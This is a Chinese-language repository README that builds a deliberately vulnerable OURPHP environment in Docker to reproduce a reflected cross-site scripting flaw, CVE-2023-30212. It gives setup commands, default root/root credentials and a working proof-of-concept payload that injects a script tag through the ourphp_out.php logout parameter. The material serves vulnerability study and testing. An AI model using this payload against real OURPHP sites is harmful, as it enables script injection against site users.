此仓库包含必要的目录和Dockerfile,用于复现OURPHP中的一个跨站脚本(XSS)漏洞(CVE-2023-30212)。
前置条件
安装Docker
sudo apt install -y docker.io
使用git clone下载此仓库中的文件
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git 。
包含必要的目录和Dockerfile,用于复现该场景。
下载文件后,使用以下命令构建Docker镜像:
sudo docker build -t <给Docker取个合适的名称> . 。
! 为Docker镜像添加一个名称,以便后续调用。
将Docker镜像转换为容器,使用:
sudo docker run -d -p 80:80 <Docker镜像名称> 。
! 此处将容器端口映射到主机80端口。
查看Docker容器状态:
sudo docker ps
完成上述步骤后,
访问localhost并使用以下凭据配置OURPHP: 用户名:root 密码:root 数据库名称:data
现在需要配置管理员用户名和密码。设置如下: 用户名:root 密码:root 然后继续操作。
我们的payload为:
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
将此payload附加到localhost或127.0.0.1之后,即可触发XSS。